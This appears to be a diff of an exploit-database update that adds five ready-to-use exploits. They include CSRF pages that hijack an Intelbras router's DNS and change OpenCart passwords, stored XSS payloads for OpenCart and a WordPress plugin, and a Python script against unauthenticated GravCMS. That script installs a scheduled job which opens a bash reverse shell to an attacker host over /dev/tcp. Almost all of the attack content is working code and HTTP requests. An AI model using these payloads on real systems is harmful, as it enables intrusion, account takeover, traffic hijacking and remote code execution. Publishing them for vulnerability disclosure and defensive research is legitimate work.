DB: 2021-06-10

5 changes to exploits/shellcodes

Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)
OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)
OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)

exploits/hardware/webapps/49969.html

@@ -0,0 +1,22 @@
+# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)
+# Date: 01/05/2021
+# Exploit Author: Rodolfo Mariano
+# Version: Firmware 1.1.2-1.1.5
+# CVE: 2021-32403
+
+# Exploit Code: 
+<html>
+    <form action="http://10.0.0.1/goform/setSysTools" method="POST">
+        <input name="module3" value="lanCfg" type="hidden">
+        <input name="lanIP" value="10.0.0.1" type="hidden">
+        <input name="lanMask" value="255.255.255.0" type="hidden">
+        <input name="dhcpEn" value="true" type="hidden">
+        <input name="lanDhcpStartIP" value="10.0.0.100" type="hidden">
+        <input name="lanDhcpEndIP" value="10.0.0.200" type="hidden">
+        <input name="lanDns1" value="192.168.0.30" type="hidden">
+        <input name="lanDns2" value="" type="hidden">
+    </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+</html>

exploits/php/webapps/49970.html

@@ -0,0 +1,73 @@
+# Exploit Title		: OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)
+# Date		    	: 2021/08/06
+# Exploit Author	: Mert Daş merterpreter@gmail.com
+# Software Link 	: http://www.opencart.com/index.php?route=download/download
+					: https://github.com/opencart
+# Software web  	: www.opencart.com
+# Tested on: Server : Xampp
+
+# Cross-site request forgery
+
+OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
+
+OpenCart is not using any security token to prevent it against CSRF.
+It is vulnerable to all location inside User panel.
+
+Header
+
+----------------------------------------------------------
+http://localhost/index.php?route=account/password
+
+POST /opencart/index.php?route=account/password HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675
+Content-Length: 300
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/opencart/index.php?route=account/password
+Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
+Upgrade-Insecure-Requests: 1
+
+-----------------------------3890527419799841332130342675
+Content-Disposition: form-data; name="password"
+
+123asd!
+-----------------------------3890527419799841332130342675
+Content-Disposition: form-data; name="confirm"
+
+123asd!
+-----------------------------3890527419799841332130342675--
+
+
+Response
+
+HTTP/1.1 302 Found
+Date: Tue, 08 Jun 2021 16:52:59 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
+X-Powered-By: PHP/7.4.20
+Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/
+Location: http://127.0.0.1/opencart/index.php?route=account/account
+Content-Length: 0
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+----------------------------------------------------------
+
+Simple Poc to change user Password
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="password" value="1234asd!" />
+      <input type="hidden" name="confirm" value="1234asd!" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/49971.txt

@@ -0,0 +1,44 @@
+# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
+# Date: 2021/08/06
+# Exploit Author: Mert Daş
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: 3.0.3.7
+# Tested on: Windows 10
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two.
+It occurs when a malicious script is injected directly into a vulnerable web application.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Subject of mail.
+
+Steps-To-Reproduce:
+1. Go to the opencart admin page.
+2. Now go to the Marketing-Mail option.
+3. Put the below payload in subject field of the Mail
+: "<script>alert(11111)</script>"
+5. Now click on send button.
+6. The XSS will be triggered.
+
+POST
+/opencart/admin/index.php?route=marketing/contact/send&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 187
+Origin: http://127.0.0.1
+Connection: close
+Referer:
+http://127.0.0.1/opencart/admin/index.php?route=marketing/contact&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t
+Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
+
+store_id=0&to=customer_all&customer_group_id=1&customers=&affiliates=&products=&subject=%3Cscript%3Ealert(1)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self

exploits/php/webapps/49972.txt

@@ -0,0 +1,19 @@
+# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
+# Date: 09/06/2021
+# Exploit Author: Mesut Cetin
+# Vendor Homepage: https://profiles.wordpress.org/domingoruiz/
+# Software Link: https://wordpress.org/plugins/visitors-app/
+# Version: 0.3 
+# Tested on: Debian GNU/Linux 10
+# Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc
+
+## Description:
+# A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through 
+# Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations
+# The 'user-agent' parameter allows attacker to escalate their privileges.
+
+## PoC
+# Replace google.com with malicious attacker page
+curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>"
+
+# on http://localhost/wordpress/wp-admin, browse the tab "visitors"

exploits/php/webapps/49973.py

@@ -0,0 +1,28 @@
+# Exploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)
+# Original Exploit Author: Mehmet Ince 
+# Vendor Homepage: https://getgrav.org
+# Version: 1.10.7
+# Tested on: Debian 10 
+# Author: legend
+
+#/usr/bin/python3
+
+import requests
+import sys
+import re
+import base64
+target= "http://192.168.1.2"
+#Change base64 encoded value with with below command.
+#echo -ne "bash -i >& /dev/tcp/192.168.1.3/4444 0>&1" | base64 -w0 
+payload=b"""/*<?php /**/
+file_put_contents('/tmp/rev.sh',base64_decode('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMy80NDQ0IDA+JjE='));chmod('/tmp/rev.sh',0755);system('bash /tmp/rev.sh');
+"""
+s = requests.Session()
+r = s.get(target+"/admin")
+adminNonce = re.search(r'admin-nonce" value="(.*)"',r.text).group(1)
+if adminNonce != "" :
+    url = target + "/admin/tools/scheduler"
+    data = "admin-nonce="+adminNonce
+    data +='&task=SaveDefault&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22'+base64.b64encode(payload).decode('utf-8')+'%22%29%29%3b&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=&data%5bstatus%5d%5bncefs%5d=enabled&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append'
+    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+    r = s.post(target+"/admin/config/scheduler",data=data,headers=headers)

files_exploits.csv

@@ -44124,3 +44124,8 @@ id,file,description,date,author,type,platform,port
 49961,exploits/php/webapps/49961.py,"Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)",2021-06-07,enox,webapps,php,
 49962,exploits/php/webapps/49962.sh,"Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)",2021-06-07,UnD3sc0n0c1d0,webapps,php,
 49967,exploits/php/webapps/49967.py,"WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)",2021-06-08,"Fellipe Oliveira",webapps,php,
+49969,exploits/hardware/webapps/49969.html,"Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)",2021-06-09,"Rodolfo Mariano",webapps,hardware,
+49970,exploits/php/webapps/49970.html,"OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)",2021-06-09,"Mert Daş",webapps,php,
+49971,exploits/php/webapps/49971.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2021-06-09,"Mert Daş",webapps,php,
+49972,exploits/php/webapps/49972.txt,"WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)",2021-06-09,"Mesut Cetin",webapps,php,
+49973,exploits/php/webapps/49973.py,"GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)",2021-06-09,legend,webapps,php,